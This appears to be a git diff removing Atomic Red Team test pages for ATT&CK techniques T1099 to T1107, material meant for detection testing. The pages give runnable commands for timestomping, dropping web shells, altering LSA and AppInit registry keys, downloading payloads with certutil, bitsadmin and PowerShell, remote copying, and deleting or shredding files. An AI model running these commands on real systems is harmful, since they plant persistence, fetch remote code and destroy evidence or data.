-| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{file_path} -Force -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: A file must exist at the path (#{file_path}) to change the last access time on
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{file_path} -Force | Out-Null
-Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Windows - Timestomp a File
-Timestomp kxwn.lock.
-
-Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file. 
-
-[Mitre ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml)
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_path | File path for timestomp payload | String | $env:appdata&#92;Microsoft|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-import-module #{file_path}\timestomp.ps1
-timestomp -dest "#{file_path}\kxwn.lock"
-```
-
-#### Cleanup Commands:
-```powershell
-Write-Host "Removing #{file_path}\timestomp.ps1"
-Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
-Write-Host "Removing #{file_path}\kxwn.lock"
-Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: timestomp.ps1 must be present in #{file_path}.
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1"
-```
-##### Description: kxwn.lock must be present in #{file_path}.
-##### Check Prereq Commands:
-```powershell
-if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Path #{file_path}\kxwn.lock -ItemType File
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1100.md b/Atomic_Threat_Coverage/Triggers/T1100.md
deleted file mode 100644
index e19e7b5..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1100.md
+++ /dev/null
@@ -1,62 +0,0 @@
-# T1100 - Web Shell
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1100)
-<blockquote>A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
-
-Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Web Shell Written to Disk](#atomic-test-1---web-shell-written-to-disk)
-
-
-<br/>
-
-## Atomic Test #1 - Web Shell Written to Disk
-This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
-Idea from APTSimulator.
-cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| web_shell_path | The path to drop the web shell | string | C:&#92;inetpub&#92;wwwroot|
-| web_shells | Path of Web Shell | path | PathToAtomicsFolder&#92;T1100&#92;src&#92;|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-xcopy #{web_shells} #{web_shell_path}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{web_shell_path} >nul 2>&1
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Web shell must exist on disk at specified location (#{web_shells})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{web_shells}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1100/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1101.md b/Atomic_Threat_Coverage/Triggers/T1101.md
deleted file mode 100644
index 7739bfc..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1101.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# T1101 - Security Support Provider
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1101)
-<blockquote>Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.
- (Citation: Graeber 2014)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Modify SSP configuration in registry](#atomic-test-1---modify-ssp-configuration-in-registry)
-
-
-<br/>
-
-## Atomic Test #1 - Modify SSP configuration in registry
-Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:&#92;Windows&#92;System32. | String | not-a-ssp|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-# run these in sequence
-$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
-$SecurityPackagesUpdated = $SecurityPackages
-$SecurityPackagesUpdated += "#{fake_ssp_dll}"
-Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
-
-# revert (before reboot)
-Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1102.md b/Atomic_Threat_Coverage/Triggers/T1102.md
deleted file mode 100644
index 3b425e7..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1102.md
+++ /dev/null
@@ -1,76 +0,0 @@
-# T1102 - Web Service
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1102)
-<blockquote>Adversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system.
-
-These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
-
-Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
-
-Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Reach out to C2 Pointer URLs via command_prompt](#atomic-test-1---reach-out-to-c2-pointer-urls-via-command_prompt)
-
-- [Atomic Test #2 - Reach out to C2 Pointer URLs via powershell](#atomic-test-2---reach-out-to-c2-pointer-urls-via-powershell)
-
-
-<br/>
-
-## Atomic Test #1 - Reach out to C2 Pointer URLs via command_prompt
-Download data from a public website using command line
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
-```
-
-#### Cleanup Commands:
-```cmd
-del %TEMP%\bitsadmindownload.html >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Reach out to C2 Pointer URLs via powershell
-Multiple download methods for files using powershell
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-Invoke-WebRequest -Uri www.twitter.com
-$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
-$wc = New-Object System.Net.WebClient
-$T1102 = $wc.DownloadString("https://www.aol.com/")
-```
-
-#### Cleanup Commands:
-```powershell
-Clear-Variable T1102 >$null 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1103.md b/Atomic_Threat_Coverage/Triggers/T1103.md
deleted file mode 100644
index 25b9bcb..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1103.md
+++ /dev/null
@@ -1,73 +0,0 @@
-# T1103 - AppInit DLLs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1103)
-<blockquote>Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)
-
-The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Install AppInit Shim](#atomic-test-1---install-appinit-shim)
-
-
-<br/>
-
-## Atomic Test #1 - Install AppInit Shim
-AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, 
-you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear.
-This will happen regular as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the 
-AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| registry_file | Windows Registry File | Path | PathToAtomicsFolder&#92;T1103&#92;src&#92;T1103.reg|
-| registry_cleanup_file | Windows Registry File | Path | PathToAtomicsFolder&#92;T1103&#92;src&#92;T1103-cleanup.reg|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-reg.exe import #{registry_file}
-```
-
-#### Cleanup Commands:
-```cmd
-reg.exe import #{registry_cleanup_file}
-```
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file})
-##### Check Prereq Commands:
-```powershell
-if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/src/T1103.reg" -OutFile "#{registry_file}"
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/src/T1103-cleanup.reg" -OutFile "#{registry_cleanup_file}"
-```
-##### Description: DLL's must exist in the C:\Tools directory (T1103.dll and T1103x86.dll)
-##### Check Prereq Commands:
-```powershell
-if ((Test-Path c:\Tools\T1103.dll) -and (Test-Path c:\Tools\T1103x86.dll)) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/bin/T1103.dll" -OutFile C:\Tools\T1103.dll
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1103/bin/T1103x86.dll" -OutFile C:\Tools\T1103x86.dll
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1105.md b/Atomic_Threat_Coverage/Triggers/T1105.md
deleted file mode 100644
index db165cc..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1105.md
+++ /dev/null
@@ -1,388 +0,0 @@
-# T1105 - Remote File Copy
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1105)
-<blockquote>Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
-
-Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - rsync remote file copy (push)](#atomic-test-1---rsync-remote-file-copy-push)
-
-- [Atomic Test #2 - rsync remote file copy (pull)](#atomic-test-2---rsync-remote-file-copy-pull)
-
-- [Atomic Test #3 - scp remote file copy (push)](#atomic-test-3---scp-remote-file-copy-push)
-
-- [Atomic Test #4 - scp remote file copy (pull)](#atomic-test-4---scp-remote-file-copy-pull)
-
-- [Atomic Test #5 - sftp remote file copy (push)](#atomic-test-5---sftp-remote-file-copy-push)
-
-- [Atomic Test #6 - sftp remote file copy (pull)](#atomic-test-6---sftp-remote-file-copy-pull)
-
-- [Atomic Test #7 - certutil download (urlcache)](#atomic-test-7---certutil-download-urlcache)
-
-- [Atomic Test #8 - certutil download (verifyctl)](#atomic-test-8---certutil-download-verifyctl)
-
-- [Atomic Test #9 - Windows - BITSAdmin BITS Download](#atomic-test-9---windows---bitsadmin-bits-download)
-
-- [Atomic Test #10 - Windows - PowerShell Download](#atomic-test-10---windows---powershell-download)
-
-- [Atomic Test #11 - OSTAP Worming Activity](#atomic-test-11---ostap-worming-activity)
-
-
-<br/>
-
-## Atomic Test #1 - rsync remote file copy (push)
-Utilize rsync to perform a remote file copy (push)
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| local_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
-| username | User account to authenticate on remote host | String | victim|
-| remote_host | Remote host to copy toward | String | victim-host|
-| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - rsync remote file copy (pull)
-Utilize rsync to perform a remote file copy (pull)
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_path | Path of folder to copy | Path | /tmp/adversary-rsync/|
-| username | User account to authenticate on remote host | String | adversary|
-| remote_host | Remote host to copy from | String | adversary-host|
-| local_path | Local path to receive rsync | Path | /tmp/victim-files|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - scp remote file copy (push)
-Utilize scp to perform a remote file copy (push)
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| local_file | Path of file to copy | Path | /tmp/adversary-scp|
-| username | User account to authenticate on remote host | String | victim|
-| remote_host | Remote host to copy toward | String | victim-host|
-| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-scp #{local_file} #{username}@#{remote_host}:#{remote_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - scp remote file copy (pull)
-Utilize scp to perform a remote file copy (pull)
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_file | Path of file to copy | Path | /tmp/adversary-scp|
-| username | User account to authenticate on remote host | String | adversary|
-| remote_host | Remote host to copy from | String | adversary-host|
-| local_path | Local path to receive scp | Path | /tmp/victim-files/|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-scp #{username}@#{remote_host}:#{remote_file} #{local_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - sftp remote file copy (push)
-Utilize sftp to perform a remote file copy (push)
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| local_file | Path of file to copy | Path | /tmp/adversary-sftp|
-| username | User account to authenticate on remote host | String | victim|
-| remote_host | Remote host to copy toward | String | victim-host|
-| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - sftp remote file copy (pull)
-Utilize sftp to perform a remote file copy (pull)
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_file | Path of file to copy | Path | /tmp/adversary-sftp|
-| username | User account to authenticate on remote host | String | adversary|
-| remote_host | Remote host to copy from | String | adversary-host|
-| local_path | Local path to receive sftp | Path | /tmp/victim-files/|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - certutil download (urlcache)
-Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
-| local_path | Local path to place file | Path | Atomic-license.txt|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - certutil download (verifyctl)
-Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
-| local_path | Local path to place file | Path | Atomic-license.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
-New-Item -Path $datePath -ItemType Directory
-Set-Location $datePath
-certutil -verifyctl -split -f #{remote_file}
-Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Windows - BITSAdmin BITS Download
-This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
-This technique is used by Qbot malware to download payloads.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bits_job_name | Name of the created BITS job | String | qcxjb7|
-| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
-| local_path | Local path to place file | Path | Atomic-license.txt|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Windows - PowerShell Download
-This test uses PowerShell to download a payload.
-This technique is used by multiple adversaries and malware families.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
-| destination_path | Destination path to file | Path | $env:TEMP&#92;Atomic-license.txt|
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-(New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}")
-```
-
-#### Cleanup Commands:
-```powershell
-Remove-Item #{destination_path} -Force -ErrorAction Ignore
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - OSTAP Worming Activity
-OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| destination_path | Path to create remote file at. Default is local admin share. | String | &#92;&#92;localhost&#92;C$|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-pushd #{destination_path}
-echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
-CScript.exe AtomicTestT1105.js //E:JScript
-del AtomicTestT1105.js /Q >nul 2>&1
-del AtomicTestFileT1105.js /Q >nul 2>&1
-popd
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1106.md b/Atomic_Threat_Coverage/Triggers/T1106.md
deleted file mode 100644
index 679dd5a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1106.md
+++ /dev/null
@@ -1,53 +0,0 @@
-# T1106 - Execution through API
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1106)
-<blockquote>Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters. (Citation: Microsoft CreateProcess)
-
-Additional Windows API calls that can be used to execute binaries include: (Citation: Kanthak Verifier)
-
-* CreateProcessA() and CreateProcessW(),
-* CreateProcessAsUserA() and CreateProcessAsUserW(),
-* CreateProcessInternalA() and CreateProcessInternalW(),
-* CreateProcessWithLogonW(), CreateProcessWithTokenW(),
-* LoadLibraryA() and LoadLibraryW(),
-* LoadLibraryExA() and LoadLibraryExW(),
-* LoadModule(),
-* LoadPackagedLibrary(),
-* WinExec(),
-* ShellExecuteA() and ShellExecuteW(),
-* ShellExecuteExA() and ShellExecuteExW()</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Execution through API - CreateProcess](#atomic-test-1---execution-through-api---createprocess)
-
-
-<br/>
-
-## Atomic Test #1 - Execution through API - CreateProcess
-Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder&#92;T1106&#92;src&#92;CreateProcess.cs|
-| output_file | Location of the payload | Path | %tmp%&#92;T1106.exe|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"#{output_file}" /target:exe #{source_file}
-%tmp/T1106.exe
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1107.md b/Atomic_Threat_Coverage/Triggers/T1107.md
deleted file mode 100644
index d274f42..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1107.md
+++ /dev/null
@@ -1,376 +0,0 @@
-# T1107 - File Deletion
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107)
-<blockquote>Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
-
-There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Delete a single file - Linux/macOS](#atomic-test-1---delete-a-single-file---linuxmacos)
-
-- [Atomic Test #2 - Delete an entire folder - Linux/macOS](#atomic-test-2---delete-an-entire-folder---linuxmacos)
-
-- [Atomic Test #3 - Overwrite and delete a file with shred](#atomic-test-3---overwrite-and-delete-a-file-with-shred)
-
-- [Atomic Test #4 - Delete a single file - Windows cmd](#atomic-test-4---delete-a-single-file---windows-cmd)
-
-- [Atomic Test #5 - Delete an entire folder - Windows cmd](#atomic-test-5---delete-an-entire-folder---windows-cmd)
-
-- [Atomic Test #6 - Delete a single file - Windows PowerShell](#atomic-test-6---delete-a-single-file---windows-powershell)
-
-- [Atomic Test #7 - Delete an entire folder - Windows PowerShell](#atomic-test-7---delete-an-entire-folder---windows-powershell)
-
-- [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux)
-
-- [Atomic Test #9 - Delete-PrefetchFile](#atomic-test-9---delete-prefetchfile)
-
-- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
-
-
-<br/>
-
-## Atomic Test #1 - Delete a single file - Linux/macOS
-Delete a single file from the temporary directory
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-rm -f #{file_to_delete}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Delete an entire folder - Linux/macOS
-Recursively delete the temporary directory and all files contained within it
-
-**Supported Platforms:** Linux, macOS
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-rm -rf #{folder_to_delete}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Overwrite and delete a file with shred
-Use the `shred` command to overwrite the temporary file and then delete it
-
-**Supported Platforms:** Linux
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-shred -u #{file_to_shred}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Delete a single file - Windows cmd
-Delete a single file from the temporary directory using cmd.exe.
-Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%&#92;deleteme_T1107|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-del /f #{file_to_delete}
-```
-
-
-
-
-#### Dependencies:  Run with `command_prompt`!
-##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
-##### Check Prereq Commands:
-```cmd
-IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) 
-```
-##### Get Prereq Commands:
-```cmd
-echo deleteme_T1107 >> #{file_to_delete}
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Delete an entire folder - Windows cmd
-Recursively delete a folder in the temporary directory using cmd.exe.
-Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
-
-**Supported Platforms:** Windows
-
-
-
-
